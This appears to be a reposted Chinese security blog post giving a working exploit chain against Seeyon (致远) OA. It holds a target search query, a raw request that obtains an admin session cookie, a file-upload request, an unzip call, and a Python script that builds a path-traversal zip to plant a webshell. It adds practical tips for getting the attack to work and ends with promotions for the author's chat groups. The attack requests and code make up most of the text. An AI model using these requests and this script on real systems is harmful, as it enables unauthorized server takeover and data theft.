致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器
title="致远"
流程:
首先是构造数据包获取管理cookie值,然后携带cookie值上传压缩文件并进行解压,达到getshell的目的。
1、获取cookie
POST /seeyon/thirdpartyController.do HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length: 112method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
2、上传压缩包
POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
User-Agent: Java/1.8.0_101
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 975
Connection: close--00content0boundary00
Content-Disposition: form-data; name="type"
--00content0boundary00
Content-Disposition: form-data; name="extensions"
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00
Content-Disposition: form-data; name="destDirectory"
--00content0boundary00
Content-Disposition: form-data; name="destFilename"
--00content0boundary00
Content-Disposition: form-data; name="maxSize"
--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"
--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="test.zip"
Content-Type: application/x-zip-compressed
zip文件
--00content0boundary00--
携带cookie上传压缩包之后,返回压缩包的一个id标识
注:这边巨坑,实际测试上传的时候,压缩包内文件只能是数字,超过10也无法解压,并且有时候压缩包必须存在layout.xml 文件(空内容即可)否则在利用解压漏洞时会解压失败
3、解压
POST /seeyon/ajax.do HTTP/1.1
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Java/1.8.0_101
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: closemethod=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2023-02-05","-6448544356250399451"]
4、测试上传结果
注:压缩包生成文件
import zipfilezf=zipfile.ZipFile('test.zip', mode='a', compression=zipfile.ZIP_DEFLATED)
fname=f'..\\1.txt'
shellcode="c9b3995f-2d74-448d-a742-34f72cfa1e14"
zf.writestr('layout.xml', "")
zf.writestr(fname, shellcode)
转载:https://bbs.zkaq.cn/t/30787.html
作者:camer
欢迎大家去关注作者
欢迎师傅加入安全交流群(qq群:611901335),或者后台回复加群
如果想和我一起讨论,欢迎加入我的知识星球!!!
扫描下图加入freebuf知识大陆
师傅们点赞、转发、在看就是最大的支持
后台回复知识星球或者知识大陆也可获取加入链接(两个加其一即可)